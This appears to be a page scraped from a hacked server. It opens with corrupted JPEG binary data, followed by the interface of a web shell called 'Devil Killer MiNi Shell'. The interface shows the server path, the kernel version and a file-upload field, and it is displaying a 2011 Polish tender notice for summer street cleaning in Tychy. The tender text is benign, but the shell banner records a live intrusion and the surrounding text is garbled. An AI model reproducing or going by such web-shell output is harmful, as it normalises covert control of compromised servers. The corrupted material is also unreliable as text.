JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111208/416928-N-2011.html

<p class="kh_header"><b>Tychy: Letnie utrzymanie czystości na terenie miasta Tychy w 2012 roku</b><br>
<b>Numer ogłoszenia: 416928 - 2011; data zamieszczenia: 08.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Ulic i Mostów , ul. Budowlanych 59, 43-100 Tychy, woj. śląskie, tel. 032 227-70-06, 3271491, faks 032 2277008.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzuim.tychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Letnie utrzymanie czystości na terenie miasta Tychy w 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na dwa zadania jak niżej:
ZADANIE  I - Letnie utrzymanie czystości dróg i ulic na terenie miasta Tychy w 2012 r.
- mechaniczne zamiatanie dróg i ulic na całej szerokości pasa jezdnego, o łącznej długości 206,62km i powierzchni 1.554.215 m2, w tym:
- drogi krajowe 35.415,00 mb, pow. 377.242 m2 
- drogi powiatowe 75.672 mb, pow. 616.590 m2 
- drogi gminne 95.532 mb, pow. 560.383 m2
- polewanie i zraszanie nawierzchni dróg i ulic na całej szerokości pasa jezdnego o łącznej długości 53 689 mb i powierzchni 475.251 m2 - krotność polewania 2 razy w sezonie wg wskazań zamawiającego,      

ZADANIE II - Utrzymanie koszy ulicznych i czystości przejść podziemnych, kładki, tuneli, zamiatanie i odchwaszczanie chodników i ścieżek rowerowych oraz letnie utrzymanie parkingów i placów na terenie miasta Tychy w 2012 r.
- jednokrotne opróżnianie 354 szt. koszy ulicznych i uporządkowanie terenu wokół koszy codziennie do godz. 7 rano,
- dwukrotne opróżnienie 66 szt. koszy ulicznych i uporządkowanie terenu wokół koszy codziennie do godz. 7 rano oraz do godz. 1500,
- zakupienie i ustawienie w ciągach ulicznych 24 szt. koszy betonowych ośmiokątnych o pojemności 50 l. z wkładem metalowym z popielniczką,
- zakupienie 60 szt wkładów metalowych do koszy betonowych
- utrzymanie czystości i porządku w przejściach podziemnych, tunelu i kładce o łącznej powierzchni 2.982 m2
- usuwanie nieczystości z przejść podziemnych, tunelu i kładki dwa razy w tygodniu (każdy wtorek i piątek tygodnia),
- zamiatanie przejść podziemnych, tunelu i kładki dwa razy w tygodniu (każdy poniedziałek i czwartek tygodnia),
- zamiatanie chodników o powierzchni 229 719 m2 i ścieżek rowerowych o powierzchni 40 000 m2 - 1 krotnie w ciągu sezonu na całej szerokości z wszelkich zanieczyszczeń (piasek, liście, szkło),
- usuwanie darni z chodników o powierzchni 72.370 m2 - ręcznie lub za pomocą środków chemicznych.
- ręczne oczyszczanie jezdni, skrzyżowań i zatok w miejscach utrudniających pracę sprzętem mechanicznym - krotność sprzątania 1 raz w miesiącu na pow. ca 45.000 m2 w okresie sezonu,
- oczyszczanie bezpieczników i krawężników z piasku, darni i innych zanieczyszczeń według wskazań zamawiającego - powierzchnia jednokrotnego oczyszczania 21.423 m2. Zamawiający przewiduje dwukrotne oczyszczanie bezpieczników w okresie sezonu,
- sprzątanie powierzchni dróg i ulic po odpustach - 17 odpustów w okresie trwania umowy, przewidywana łączna powierzchnia do sprzątania 17.000 m2, 
- usuwanie potrąconych zwierząt we wszystkie dni miesiąca o każdej porze dnia wraz z transportem i utylizacją, dyspozycyjność wykonawcy - w ciągu 1 godz. od chwili zgłoszenia wykonania usługi
przez zamawiającego - zakres usług określono w ilości 120 szt. w okresie umowy,
- usunięcie odpadów z pasów drogowych według potrzeb i wskazań zamawiającego w ilości ca 35 ton we wszystkie dni kalendarzowe o każdej porze dnia wraz z transportem, składowaniem i utylizacją. Dyspozycyjność wykonawcy w ciągu 1 godziny od chwili zgłoszenia wykonania usługi przez zamawiającego,
- czyszczenie miejsc po kolizjach samochodowych w okresie trwania umowy we wszystkie dni kalendarzowe, o każdej porze dnia (24 godz./dobę). Zamawiający przewiduje ok. 8 wyjazdów. Dyspozycyjność wykonawcy w ciągu 1 godziny od chwili zgłoszenia wykonania usługi przez zamawiającego,
- oczyszczanie pasów drogowych wzdłuż dróg krajowych DK-44 i DK 1-86 wraz z węzłami o łącznej powierzchni 1.188.264,00 m2 z wszelkiego rodzaju śmieci raz w miesiącu. Wykonawca winien skierować do zbierania śmieci każdorazowo co najmniej 3 osoby.     
- letnie utrzymanie parkingów o powierzchni 91.984,50 m2 oraz placów o powierzchni 15.120 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>ZADANIE I:
- mechaniczne zamiatanie dróg i ulic na całej szerokości pasa jezdnego
- polewanie i zraszanie nawierzchni dróg i ulic na całej szerokości pasa jezdnego 

ZADANIE II:
- jednokrotne opróżnianie koszy ulicznych i uporządkowanie terenu wokół koszy codziennie do godz. 7 rano,
- dwukrotne opróżnienie koszy ulicznych i uporządkowanie terenu wokół koszy codziennie do godz. 7 rano oraz do godz. 15:00,
- zakupienie i ustawienie w ciągach ulicznych koszy betonowych ośmiokątnych o pojemności 50 l. z wkładem metalowym z popielniczką,
- zakupienie wkładów metalowych do koszy betonowych
- utrzymanie czystości i porządku w przejściach podziemnych, tunelu i kładce
- usuwanie nieczystości z przejść podziemnych, tunelu i kładki 
- zamiatanie przejść podziemnych, tunelu i kładki
- zamiatanie chodników i ścieżek rowerowych 
- usuwanie darni z chodników 
- ręczne oczyszczanie jezdni, skrzyżowań i zatok w miejscach utrudniających pracę sprzętem mechanicznym 
- oczyszczanie bezpieczników i krawężników z piasku, darni i innych zanieczyszczeń według wskazań zamawiającego 
- sprzątanie powierzchni dróg i ulic po odpustach 
- usuwanie potrąconych zwierząt we wszystkie dni miesiąca o każdej porze dnia wraz z transportem i utylizacją, dyspozycyjność wykonawcy 
- usunięcie odpadów z pasów drogowych 
- czyszczenie miejsc po kolizjach samochodowych
- oczyszczanie pasów drogowych wzdłuż dróg krajowych DK-44 i DK 1-86 wraz z węzłami 
- letnie utrzymanie parkingów oraz placów</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.20.00-0, 90.61.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli zostanie wykazane:

a) posiadanie zezwolenia na prowadzenie działalności w zakresie transportu odpadów - dotyczy wykonawcy ubiegającego się o zamówienie częściowe w zakresie ZADANIA I i II

b) posiadanie zezwolenia na prowadzenie działalności w zakresie odbioru odpadów od właścicieli nieruchomości - dotyczy wykonawcy ubiegającego się o zamówienie częściowe w zakresie ZADANIA II.

c) posiadanie decyzji powiatowego lekarza weterynarii stwierdzającą spełnienie wymagań weterynaryjnych określonych dla prowadzenia działalności w zakresie zbierania potrąconych zwierząt - dotyczy wykonawcy ubiegającego się o zamówienie częściowe w zakresie ZADANIA II.

W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek musi spełnić co najmniej jeden podmiot.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli zostanie wykazane, wykonanie lub wykonywanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi w zakresie niezbędnym do wykazania spełniania warunku doświadczenia, tzn. usługi polegającej na:

1) mechanicznym zamiataniu dróg i ulic w okresie 1 sezonu o łącznej powierzchni co najmniej 780 000 m2 - dot. ZADANIA I

2) mechanicznym zamiataniu chodników lub ścieżek rowerowych lub dróg lub parkingów lub placów w okresie 1 sezonu o łącznej powierzchni co najmniej 200 000 m2 - dot. ZADANIA II 

3) opróżnianie koszy w ilości minimum 200 szt. w okresie 1 sezonu z częstotliwością minimum 3 razy w tygodniu - dot. ZADANIA II 

4) dyżurowanie i zbieranie padłych zwierząt w okresie 1 sezonu na terenie miasta o powierzchni co najmniej 40 km2 - dot. ZADANIA II 
Wykazane usługi muszą być poparte dokumentem potwierdzającym, że zostały wykonane należycie lub są wykonywane należycie.

W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek musi spełnić co najmniej jeden podmiot.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli zostanie wykazane, dysponowanie niezbędnym do wykonania zamówienia potencjałem technicznym jn.:

1) ZADANIE I
zamiatarka uliczna z funkcją zraszania o wydajności min. 15 000 m2/godz. - min. 2 szt.
zamiatarka uliczna z funkcją zraszania o wydajności min. 35 000 m2/godz. z możliwością zamiatania zarówno prawego jak i lewego pasa jezdni poruszając się zgodnie z kierunkiem ruchu- min. 1 szt.
polewarka uliczna o pojemności zbiornika 6-10 m3 - min. 1 szt.

2) ZADANIE II 
zamiatarka chodnikowa z funkcją zraszania o ciężarze własnym zamiatarki do 2,5 ton - min. 2 szt.
samochód dostawczy o ładowności do 3 ton lub ciągnik z przyczepą o ład. do 3,5 tony - min. 2 szt.

W przypadku składania oferty przez podmioty występujące wspólnie o udzielenie zamówienia ww. warunek podmioty te mogą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli zostanie wykazane, dysponowanie osobami zdolnymi do wykonania zamówienia tj.:

1) ZADANIE I 

- jedną osobą koordynującą prace i posiadająca co najmniej roczne doświadczenie zawodowe w nadzorowaniu prac polegających na letnim utrzymaniu 

1) ZADANIE II 
- jedną osobą koordynującą prace i posiadająca co najmniej roczne doświadczenie zawodowe w nadzorowaniu prac polegających na letnim utrzymaniu 

- co najmniej dwie brygady 3-osobowe do prac ręcznych

Osoba nadzorujące prace oraz osoby wchodzące w skład brygad ręcznych w ww. załącznikach wini być wymienieni z imienia i nazwiska wraz z podaniem doświadczenia zawodowego. 

W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek podmioty te mogą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) druk OFERTA WYKONAWCY
b) druk KOSZTORYS OFERTOWY
c) w przypadku wykonawców ubiegających się wspólnie o zamówienie, pełnomocnictwo dla jednego z wykonawców lub osoby trzeciej, podpisane przez wszystkich wykonawców wspólnie ubiegających się o zamówienie	
e) jeżeli wykonawcę reprezentuje pełnomocnik należy załączyć stosowne pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów dołączonych do oferty
f) wzór umowy z parafowanymi stronami oraz podpisaną ostatnią stroną umowy 
g) oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pzp</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzuim.tychy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Ulic i Mostów
43-100 Tychy
ul. Budowlanych 59
pokój nr 201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2011 godzina 09:00, miejsce: Miejski Zarząd Ulic i Mostów
43-100 Tychy
ul. Budowlanych 59
pokój nr 201.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin wykonania zamówienia
ZADANIE I:
- mechaniczne oczyszczanie dróg oraz polewanie i zraszanie ulic od 16.04.2012 r. do 31.10.2012 r.
ZADANIE II:
- opróżnianie koszy, zakupienie koszy i wkładów do koszy, usuwanie potrąconych zwierząt, likwidacja miejsc zanieczyszczonych, sprzątanie powierzchni dróg i ulic po odpustach oraz czyszczenie miejsc po kolizjach samochodowych od 01.01.2012 r. do 31.12.2012 r. 
- utrzymanie czystości i porządku w przejściach podziemnych, kładki, tuneli, zamiataniu i odchwaszczaniu chodników i ścieżek rowerowych, oczyszczanie bezpieczników i krawężników, ręczne oczyszczanie jezdni, skrzyżowań i zatok, oczyszczanie psów drogowych, zamiatanie parkingów i placów, zbieranie zanieczyszczeń i usuwanie darni z parkingów i placów od 16.04.2012 r. do 31.10.2012 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE I - Letnie utrzymanie czystości dróg i ulic na terenie miasta Tychy w 2012 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. mechaniczne zamiatanie dróg i ulic na całej szerokości pasa jezdnego, o łącznej długości 206,62km i powierzchni 1.554.215 m2, w tym:
- drogi krajowe 35.415,00 mb, pow. 377.242 m2 
- drogi powiatowe 75.672 mb, pow. 616.590 m2 
- drogi gminne 95.532 mb, pow. 560.383 m2
2. polewanie i zraszanie nawierzchni dróg i ulic na całej szerokości pasa jezdnego o łącznej długości 53 689 mb i powierzchni 475.251 m2 - krotność polewania 2 razy w sezonie wg wskazań zamawiającego,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE II - Utrzymanie koszy ulicznych i czystości przejść podziemnych, kładki, tuneli, zamiatanie i odchwaszczanie chodników i ścieżek rowerowych oraz letnie utrzymanie parkingów i placów na terenie miasta Tychy w 2012 r..</p>
